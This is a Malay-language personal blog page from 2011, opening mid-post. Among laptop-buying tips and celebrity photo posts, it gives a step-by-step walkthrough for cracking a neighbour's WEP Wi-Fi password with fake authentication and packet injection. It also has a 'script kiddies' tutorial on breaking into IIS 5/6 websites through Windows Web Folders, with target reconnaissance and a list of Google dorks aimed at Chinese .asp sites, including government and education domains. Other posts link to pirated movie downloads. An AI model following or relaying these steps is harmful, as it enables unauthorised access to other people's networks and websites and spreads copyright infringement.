</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">9. -Bila dah masuk program tu, korang click ikon ke-5 (lambang botol susu) pastu click yes..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">10. -Click kotak wlan0, lepas tu klik next dan click scan..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">11. -Lepas scan, dia akan tunjukkan smua nama2 wifi yg ada dskitar anda yg nak dhack tu la dlm msa 30 saat..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">12. -Click wireless mana yang nak hack dan dia akan highlight sendiri lepas tu klik next..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">13. -click advanced mode..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">14. -Click capture, lepas tu klik fake auth (by force)</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">15. -Click access to information, klik start. tunggu sampai dia tulis Connected to 5c:d9:88:b5:80:93(contoh jak). lepas tu klik X untuk kotak fake authentication with AP (maksudnya tutup kotak tu)</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">16. -Tick kotak Auto Run. klik Interactive 0841 (-2). tgk kotak kat kiri atas, tgk bahagian Beacons, tunggu sampai 1,000 + lebih. lepas tu klik kotak Previous (All Stop!)..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">17. -Click advance mode..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">18. -Click capture. klik fake auth (by force)..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">19. -Click access to information, klik start. tunggu sampai dia tulis Connected to(mcm step ke-15 diatas). kali nie tak payah tutup kotak nie yah..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">20. -Click Interactive 0841 (-2). tgk kotak kat kiri atas, tgk bahagian Data, tunggu sampai 10,000 + lebih. lepas tu klik kotak start crack..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">21. -Kalau dia keluar tulisan failed, korang boleh tunggu dia akan run sendiri atau korang boleh klik stop crack, lepas tu klik start crack sekali lagi..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">22. -Kalau berjaya dia akan tulis key found. angka dalam key found (............) tu la password wifi tu tapi korang kena ambil angka jak yah, yang tanda titik bertindih mcm ni -> : korang abaikan.</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">23. -Lepas dah dpat password tu korang bleh la on kan laptop korang tpi remove kan cd n usb tu dlu klu tak dia jd boot lg tu nt k..</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span style="font-size: small;"><br />
</span></div><div style="color: black; font-family: inherit; line-height: 16px; padding: 0px; text-align: justify;"><span class="Apple-style-span" style="font-size: small;">24. -Ok bla dah on laptop,korang buka wifi korang n cari nama wifi yg korang hack tdi n click connect n masukkn pasword yg dah d hack tu..</span></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com1tag:blogger.com,1999:blog-5159176994329752150.post-23073456914677149062011-10-30T17:43:00.001+08:002011-10-30T23:13:48.494+08:00Tip nak beli Lappy :DLaptop <br />
<br />
Komputer Riba atau lebih dikenali sebagai ‘laptop’ kini sudah bukan lagi menjadi satu lambang kemewahan. Seseorang yang sentiasa bergerak ke sana ke mari, pasti memilih laptop sebagai ‘teman sejati’ yang akan menemani setiap pekerjaan mereka kemanapun mereka pergi.<br />
<br />
Namun apabila tiba sahaja saat ingin membeli laptop, pasti ramai yang kebingungan kerana takut tersalah beli atau spesifikasi tak power atau apa sahaja yang mungkin tak kena memandangkan laptop bukanlah suatu barang yang murah.<br />
<br />
Lebih-labih lagi di zaman yang serba moden ini, cepat sahaja muncul pelbagai jenis laptop dengan beragam spesifikasi dan jenama serta harganya. Syarikat-syarikat pengeluar komputer dan perisian berlumba-lumba memperkenalkan model terbaru selang hanya beberapa bulan.<br />
<br />
Mungkin terdapat ramai pengguna yang membeli laptop dengan spesifikasi yang paling canggih tanpa memikirkan kegunaannya. Penggunaan laptop hanya untuk memeriksa email dan membaca suratkhabar online sahaja, tetapi specifikasi laptopnya mencapai sehingga 3GHz processor, 1GB RAM, 120 GB Harddisk. Pasti harga bagi laptop begini begitu mahal.<br />
<br />
Bagaimana memilih laptop yang sesuai dengan keperluan? Saya kongsikan beberapa tips singkat seperti berikut:<br />
<b style="color: blue;">Kegunaan#</b><br />
Tentukan duhulu kegunaannya, apakah laptop akan dipakai untuk kegunaan pejabat, kegunaan biasa dirumah (Email, News, Microsoft Office), design, gaming, blogging, pembangunan sistem, download movies dan mp3, mobile atau kesemua yang dinyatakan.<br />
<br />
Jika laptop hanya dipakai untuk kegunaan biasa dirumah seperti email, membaca berita, melayari internet, menaip surat dsbnya, kelajuan processor, Kapasiti RAM (Random Access Memory), Harddisk dan Graphic Card (VGA Card - Video Graphics Array) tidak perlu tinggi. Spesifikasi yang sederhana sudah lebih dari mencukupi. Jika membeli laptop dengan spesifikasi yang sederhana boleh menjimatkan wang anda.<br />
<br />
Jika laptop anda dipakai untuk tujuan design dan gaming, sebaiknya anda memilih spesifikasi laptop dengan menitikberatkan pada VGA Card dan memori yang tinggi. Jika anda ingin laptop dengan kemampuan lebih tinggi, memilih teknologi multi-core dan processor 64-bit sangat disarankan.<br />
<br />
Laptop dengan VGA yang tinggi kekuatannya dan memori yang besar akan membuatkan design serta permainan game anda terasa lebih ‘ringan’. Card VGA sendiri berguna untuk menterjemahkan output komputer ke monitor. Sedangkan memori (RAM) merupakan satu alat penyimpan data digital sementara yang biasanya mempunyai ukuran kapasiti berdasarkan standard bit digital seperti 16MB, 32MB,64MB, 128MB, 256MB, 520MB, 1064MB dan seterusnya.<br />
<br />
Untuk system developing, anda boleh memilih laptop dengan mempertimbangkan prosesor dan memori yang mempunyai spesifikasi tinggi agar mampu mengimbangi perkembangan developing tools. Teknologi multi-core dan processor architecture 64-bit juga disarankan.<br />
<br />
Bagi seseorang yang bergerak kemana-mana, anda boleh menekankan pilihan pada jangka hayat bateri, berat laptop, ukuran screen serta beberapa feature internal connectivity seperti wifi, bluetooth, IrDA, NetworkCard, Modem dsbnya.<br />
<br />
<b style="color: blue;">Layout#</b><br />
Selepas anda menentukan kegunaan laptop bagi diri anda, perkara lain yang harus dipertimbangkan sebelum membeli laptop adalah tentang saiz screen, berat laptop dan jangka hayat bateri. Jika anda sering membawa laptop kemana-mana, sebaiknya pilih laptop yang ringan, dengan ukuran screen yang tidak terlalu besar agar tidak susah membawanya.<br />
<br />
Jangka hayat bateri juga penting. Ada sesetengah bateri laptop tidak mampu bertahan 2 hingga 3 jam tanpa disambungkan ke soket. Jadi, titikberatkan jangka hanyat bateri jika anda seorang yang ‘mobile’. Jika anda ingin menjimatkan penggunaan bateri, matikan fungsi connectivity seperti Wifi atau Bluetooth kerana fungsi tersebut akan banyak menggunakan tenaga dari bateri.<br />
<br />
<b style="color: blue;">Service yang disediakan dan alatganti#</b><br />
Ketika hendak membeli laptop, jangan lupa untuk mempertimbangkan service yang disediakan oleh syarikat pengeluar laptop tersebut seperti warranty dsbnya. Terdapat syarikat pengeluar yang menyediakan khidmat servis dan pembaikian dirumah. Mereka juga ada yang menyediakan khidmat ‘home collection’ and ‘home delivery’ sewaktu kita mahu membuat warranty claim. Dan satu perkara lagi, jangan memilih laptop yang alatganti-nya amat susah untuk dicari.Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-83710895890529854062011-10-30T17:18:00.002+08:002011-10-30T23:56:16.324+08:00tutorial hack for script kiddies :D<div style="text-align: center;">MULA DNGN BISMILLAH^^, IKOT TAW .. ,:: Dengan menggunakan web folder yang disediakan oleh OS Windows sendiri. </div><div style="text-align: center;">Namun perlu diketahui, teknik ini hanya berlaku untuk website yang menggunakan OS Windows dan pelayan IIS 5.0/6.0. </div><div style="text-align: center;">Lalu bagaimana cara mengetahui bahawa target kita menggunakan pelayan IIS? </div><div style="text-align: center;">Mudah saja, sila buka netcraft.com dan masukkan target kita ke textbox yang tersedia,</div><div style="text-align: center;"> maka akan kita dapatkan maklumat website tersebut, termasuk OS dan pelayan yang digunakan.</div><div style="text-align: center;">Jika anda ingin mendapatkan target secara rawak boleh menggunakan google dork dengan menggunakan</div><div style="text-align: center;"> keyword allinurl: *. asp, allinurl: *. aspx dan sebagainya. OK, </div><div style="text-align: center;">1. Buka My Computer lalu lihat icon web folder, dan klik 2x icon web folder (Win 98/ME/2000). </div><div style="text-align: center;">Jika anda menggunakan windows XP secara default tidak akan mencari folder tersebut di My Computer, </div><div style="text-align: center;">tapi kamu boleh membuat secara manual dengan membuat shortcut baru. Ini langkahnya: -</div><div style="text-align: center;"> Klik kanan pada desktop, </div><div style="text-align: center;">kemudian pilih New -> Shortcut. - Maka akan ada popup yang meminta untuk memasukkan destinasi, </div><div style="text-align: center;">lalu kamu masukkan alamat dibawah ini:%WINDIR%\EXPLORER.EXE ,::{20D04FE0-3AEA-1069-A2D8-08002B30309D}\::{BDEADF00-C265-11d0-BCED-00A0C90AB50F}</div><div style="text-align: center;">Jika sudah sila klik Next -> Next -> Finish. - Jika shortcut nya sudah terbentuk, dan klik 2x pada shortcut tersebut </div><div style="text-align: center;">2. Jika anda sudah berjaya membuka web folder tersebut kemudian klik kanan dan pilih New Web Folder </div><div style="text-align: center;">3. Lalu akan muncul popup (Add Web Folder) yang meminta untuk memasukkan alamat tujuan.</div><div style="text-align: center;"><br />
</div><div style="text-align: center;">Dork Google :</div><div style="text-align: center;">inurl:.ah.cn/*.asp</div><div style="text-align: center;">inurl:.bj.cn/*.asp</div><div style="text-align: center;">inurl:.cq.cn/*.asp</div><div style="text-align: center;">inurl:.fj.cn/*.asp</div><div style="text-align: center;">inurl:.gd.cn/*.asp</div><div style="text-align: center;">inurl:.gs.cn/*.asp</div><div style="text-align: center;">inurl:.gz.cn/*.asp</div><div style="text-align: center;">inurl:.gx.cn/*.asp</div><div style="text-align: center;">inurl:.ha.cn/*.asp</div><div style="text-align: center;">inurl:.hb.cn/*.asp</div><div style="text-align: center;">inurl:.he.cn/*.asp</div><div style="text-align: center;">inurl:.hi.cn/*.asp</div><div style="text-align: center;">inurl:.hl.cn/*.asp</div><div style="text-align: center;">inurl:.hn.cn/*.asp</div><div style="text-align: center;">inurl:.jl.cn/*.asp</div><div style="text-align: center;">inurl:.js.cn/*.asp</div><div style="text-align: center;">inurl:.jx.cn/*.asp</div><div style="text-align: center;">inurl:.ln.cn/*.asp</div><div style="text-align: center;">inurl:.nm.cn/*.asp</div><div style="text-align: center;">inurl:.nx.cn/*.asp</div><div style="text-align: center;">inurl:.qh.cn/*.asp</div><div style="text-align: center;">inurl:.sc.cn/*.asp</div><div style="text-align: center;">inurl:.sd.cn/*.asp</div><div style="text-align: center;">inurl:.sh.cn/*.asp</div><div style="text-align: center;">inurl:.sn.cn/*.asp</div><div style="text-align: center;">inurl:.sx.cn/*.asp</div><div style="text-align: center;">inurl:.tj.cn/*.asp</div><div style="text-align: center;">inurl:.tw.cn/*.asp</div><div style="text-align: center;">inurl:.xj.cn/*.asp</div><div style="text-align: center;">inurl:.xz.cn/*.asp</div><div style="text-align: center;">inurl:.yn.cn/*.asp</div><div style="text-align: center;">inurl:.zj.cn/*.asp</div><div style="text-align: center;">inurl:.ac.cn/*.asp</div><div style="text-align: center;">inurl:.com.cn/*.asp</div><div style="text-align: center;">inurl:.edu.cn/*.asp</div><div style="text-align: center;">inurl:.gov.cn/*.asp</div><div style="text-align: center;">inurl:.net.cn/*.asp</div><div style="text-align: center;">inurl:.org.cn/*.asp</div><div style="text-align: center;"><br />
</div><div style="text-align: center;">kredit to Boss TD : <a href="http://www.facebook.com/wanzpro98">MrWanz TD</a></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-63199938915327448012011-10-30T16:50:00.000+08:002011-10-30T16:50:30.014+08:00DownLoaD Rango DvD Rip :D<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnuhvfdqUv6lazGM3ap9fRlDGy38YRYbGjBHDBM7LFXGNhlxvjDlirj0SX5rsNh7o7WcxpOi7fK29w7sxCMQl6ZgkE-RLYAzBu_KFbXi9rpx8BNnbv2n4CRh9ivD2HTwknFG3WaJSaVIx/s1600/5roxdg19nwni.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiKnuhvfdqUv6lazGM3ap9fRlDGy38YRYbGjBHDBM7LFXGNhlxvjDlirj0SX5rsNh7o7WcxpOi7fK29w7sxCMQl6ZgkE-RLYAzBu_KFbXi9rpx8BNnbv2n4CRh9ivD2HTwknFG3WaJSaVIx/s320/5roxdg19nwni.jpg" width="204" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="color: yellow;"><b><u>DownLoaD :</u></b></span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: yellow;"><b>link1:</b></span><a href="http://www.mediafire.com/?t6wc9i9ulm3uot8">http://www.mediafire.com/?t6wc9i9ulm3uot8</a></div><div style="text-align: center;"><span class="Apple-style-span" style="color: yellow;"><b>link2:</b></span><a href="http://www.mediafire.com/?63xivp6g28i2l86">http://www.mediafire.com/?63xivp6g28i2l86</a></div><div style="text-align: center;"><span class="Apple-style-span" style="color: yellow;"><b>link3:</b></span><a href="http://www.mediafire.com/?abwocvjs7ok7cie">http://www.mediafire.com/?abwocvjs7ok7cie</a></div><div style="text-align: right;"><strike><span class="Apple-style-span" style="color: yellow;">credit to : teamhanna</span></strike></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-24653119744066698292011-10-30T16:38:00.001+08:002011-10-30T16:40:24.708+08:00Not so HOT 3 :D<div class="separator" style="clear: both; text-align: center;">Who is This Girl :D</div><div class="separator" style="clear: both; text-align: center;">it Marinda Kerr</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGE_M-egU6d7JgevHr_fCGey8IMU47IMTF1KEhFfj9qkTkLjWwKSDC8424bWJuq5o_J-j3l6VdsYyeapWkiWLty8MJ_YPEUQrcRb-9z4k360er6kpZgk53FxBL9tOSOEqxToNG_cOQBHC3/s1600/MIRANDA_02+%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgGE_M-egU6d7JgevHr_fCGey8IMU47IMTF1KEhFfj9qkTkLjWwKSDC8424bWJuq5o_J-j3l6VdsYyeapWkiWLty8MJ_YPEUQrcRb-9z4k360er6kpZgk53FxBL9tOSOEqxToNG_cOQBHC3/s1600/MIRANDA_02+%25281%2529.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwWvz-eadwGfkzsuRGs_VJJvdFH1DaNtjLbl05aGrj-lFr_QnN6TdqzqrFzJJZBwFr-RdnXPwSOASL78-Fgxnw-qW4XqDh1nFKRQXzfUDDBMeeZoKLJcGuhFktyfKzSh64tp88Z-9bPmjN/s1600/MIRANDA_03+%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgwWvz-eadwGfkzsuRGs_VJJvdFH1DaNtjLbl05aGrj-lFr_QnN6TdqzqrFzJJZBwFr-RdnXPwSOASL78-Fgxnw-qW4XqDh1nFKRQXzfUDDBMeeZoKLJcGuhFktyfKzSh64tp88Z-9bPmjN/s1600/MIRANDA_03+%25281%2529.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><br />
<div class="separator" style="clear: both; text-align: center;"></div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17rBmynt9ko_aS749d3hk5Pa7f89WleyPy_7iH_YCn5xoH4pX6_bm6YafQy20PpOxe8dhc5NpTup3RT6SOmD3cZ8w5iqKEvPHzgWPzan0aNRIfEs4YD0E_l2Dcu4-QH43__FSDUtkhu7G/s1600/MIRANDA_04.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh17rBmynt9ko_aS749d3hk5Pa7f89WleyPy_7iH_YCn5xoH4pX6_bm6YafQy20PpOxe8dhc5NpTup3RT6SOmD3cZ8w5iqKEvPHzgWPzan0aNRIfEs4YD0E_l2Dcu4-QH43__FSDUtkhu7G/s400/MIRANDA_04.jpg" width="249" /></a></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-54620781956267239882011-10-30T16:27:00.002+08:002011-10-30T16:30:47.078+08:00DownLoaD Puss In The Boot :D<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIye7dv77LnwFB53D6cmrmYuoY8dC1-6AWrPdjxjB6_GXpHVPwSRgJcBFt_pmXAN6NHfS9iRo7yUmaQ3DwHicwhoBUcMrByk0aooXHonwWfPUmYX5-7KWYqwGHkbGOSn9rvPbg3M_Wxe-u/s1600/Puss+in+Boots+%25282011%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjIye7dv77LnwFB53D6cmrmYuoY8dC1-6AWrPdjxjB6_GXpHVPwSRgJcBFt_pmXAN6NHfS9iRo7yUmaQ3DwHicwhoBUcMrByk0aooXHonwWfPUmYX5-7KWYqwGHkbGOSn9rvPbg3M_Wxe-u/s320/Puss+in+Boots+%25282011%2529.jpg" width="204" /></a></div><div style="text-align: center;"><span class="Apple-style-span" style="color: yellow;"><u><b>Download</b></u></span></div><div style="text-align: center;"><span class="Apple-style-span" style="color: yellow;"><b>link 1: </b></span><a href="http://www.mediafire.com/?we7w68ds50l678e">http://www.mediafire.com/?we7w68ds50l678e</a></div><div style="text-align: center;"><span class="Apple-style-span" style="color: yellow;"><b>link2 :</b></span><a href="http://www.mediafire.com/?5hq23cs5cift65b">http://www.mediafire.com/?5hq23cs5cift65b</a></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-73951042884831953672011-10-30T16:10:00.001+08:002011-10-30T16:11:21.594+08:00DownLoaD Change UP :D<div style="text-align: center;">movie the change up :D</div><div style="text-align: center;">sedot2</div><div style="text-align: center;">quality BRRIP= BlueRay Rip </div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzVRDV7wfZ6pA3L_Bv1ILEuNK3U8LEPo-ehuAVZET_znivuUJl2oc-bdFtlrGcskulgJ6W4aHaC53wtrvktKnVsKerad2qhKt5YDgDMRMFEyXc35kphJd0tNSalgZhJIy_wncW_CLiLHxj/s1600/4d6c13adab.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjzVRDV7wfZ6pA3L_Bv1ILEuNK3U8LEPo-ehuAVZET_znivuUJl2oc-bdFtlrGcskulgJ6W4aHaC53wtrvktKnVsKerad2qhKt5YDgDMRMFEyXc35kphJd0tNSalgZhJIy_wncW_CLiLHxj/s320/4d6c13adab.jpg" width="262" /></a></div><div style="text-align: center;">nah link:</div><div style="text-align: center;">1) <a href="http://www.mediafire.com/?6l2m36cee6qw3o5">http://www.mediafire.com/?6l2m36cee6qw3o5</a></div><div style="text-align: center;">2) <a href="http://www.mediafire.com/?rbg0mckafwbq8e5">http://www.mediafire.com/?rbg0mckafwbq8e5</a></div><div style="text-align: center;">3) <a href="http://www.mediafire.com/?y38i9sglgyhytl6">http://www.mediafire.com/?y38i9sglgyhytl6</a></div><div style="text-align: center;">4) <a href="http://www.mediafire.com/?8uetwkf9l2fbmo2">http://www.mediafire.com/?8uetwkf9l2fbmo2</a><br />
<div style="text-align: right;">credit to :TeamHanna :D</div></div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-4828409967454277252011-10-30T15:28:00.000+08:002011-10-30T15:28:56.861+08:00FCK YUO :D<div class="separator" style="clear: both; text-align: center;"><iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='320' height='266' src='https://www.youtube.com/embed/791Dr-VH-Zw?feature=player_embedded' frameborder='0'></iframe></div><div style="text-align: center;">LOL :D</div><div style="text-align: center;">korang kene tgk nie...haha...</div><div style="text-align: center;"><br />
</div>Adios TDhttp://www.blogger.com/profile/00071510321782940313noreply@blogger.com0tag:blogger.com,1999:blog-5159176994329752150.post-918653544030254452011-10-30T08:15:00.000+08:002011-10-30T08:15:02.311+08:00Not so HOT 2 :D<div style="text-align: center;">ada 1 post lagi sebelum adios tido nie :D</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidHh4N-MPX7lo7LRtmicbA37wkdYlvWMS8p7vyuJYxIOqV30Tqw0KszNtwSKX2vY8ZADsibo2rB9Qo0Cncr4sYrEGb1ULZzMdNbEZpgliTxFPGtcPkwQpXoLRb9_uF-QfcYaxcLX01E4Ym/s1600/images+%25283%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEidHh4N-MPX7lo7LRtmicbA37wkdYlvWMS8p7vyuJYxIOqV30Tqw0KszNtwSKX2vY8ZADsibo2rB9Qo0Cncr4sYrEGb1ULZzMdNbEZpgliTxFPGtcPkwQpXoLRb9_uF-QfcYaxcLX01E4Ym/s1600/images+%25283%2529.jpg" /></a></div><div style="text-align: center;">spe?? xkan xkenal..hehe</div><div style="text-align: center;">hot widow :D</div><div style="text-align: center;">more pic....coming up</div><div style="text-align: center;">juz scroll down babe :D</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;"><br />
</div><div style="text-align: center;">here we go guys :D</div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMNBaXmDs1p4C4QQ-Jj4pxnmkD7tIOPqE13K9a2MJwsW2l20XocLbYXk8GK4LTJgzw9vGSuQWM0_-TvmOCCvXo94cU50S1Kl_KoR9A0_ut7tWYadIJ2T45MJKCWL42YvaxECiqYfCzeDC2/s1600/images+%25281%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjMNBaXmDs1p4C4QQ-Jj4pxnmkD7tIOPqE13K9a2MJwsW2l20XocLbYXk8GK4LTJgzw9vGSuQWM0_-TvmOCCvXo94cU50S1Kl_KoR9A0_ut7tWYadIJ2T45MJKCWL42YvaxECiqYfCzeDC2/s1600/images+%25281%2529.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ylyXuKIDW1d89MOO_PQFzIZQJ5WFbRLXZjziDMlDXZKfhr0p2iZR0MNCBZvBWBiDnz6UKz5ahIu_MWRXiiHcqp1tCydy0_CHyJ6H4OHx4E0IJq1dQ8O_i3KIJdUKt1gcYDvP9AGte7Ef/s1600/images+%25282%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4ylyXuKIDW1d89MOO_PQFzIZQJ5WFbRLXZjziDMlDXZKfhr0p2iZR0MNCBZvBWBiDnz6UKz5ahIu_MWRXiiHcqp1tCydy0_CHyJ6H4OHx4E0IJq1dQ8O_i3KIJdUKt1gcYDvP9AGte7Ef/s1600/images+%25282%2529.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEPrVRVajr_4UW-TsoHdYHXmYBRBZLW77O2Uu8m45FmN9Z8eldA2ttX5F2L99yaaHQUKizq8iNCEL-lPsXk9lMPJrUkwn8l8mVTkKqdEEIS-UzIPCoGl0RKL1dD6Fzu1T5z_XKMK67T_J3/s1600/images+%25284%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEPrVRVajr_4UW-TsoHdYHXmYBRBZLW77O2Uu8m45FmN9Z8eldA2ttX5F2L99yaaHQUKizq8iNCEL-lPsXk9lMPJrUkwn8l8mVTkKqdEEIS-UzIPCoGl0RKL1dD6Fzu1T5z_XKMK67T_J3/s1600/images+%25284%2529.jpg" /></a></div><br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2CPRp916w3wYjcPyeoLg2phlm864pUH46Ynb3iIkjqkygNQ-aL42NYLqDIk7RzednKUFugdFuczaKC-ju85pXZW92ZE-2_cKI0lDaeFYy2BZneM5cMK0p2IIt5iWhCCj-jNDKGokqKJxb/s1600/images+%25285%2529.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi2CPRp916w3wYjcPyeoLg2phlm864pUH46Ynb3iIkjqkygNQ-aL42NYLqDIk7RzednKUFugdFuczaKC-ju85pXZW92ZE-2_cKI0lDaeFYy2BZneM5cMK0p2IIt5iWhCCj-jNDKGokqKJxb/s1600/images+%25285%2529.jpg" /></a></div><br />
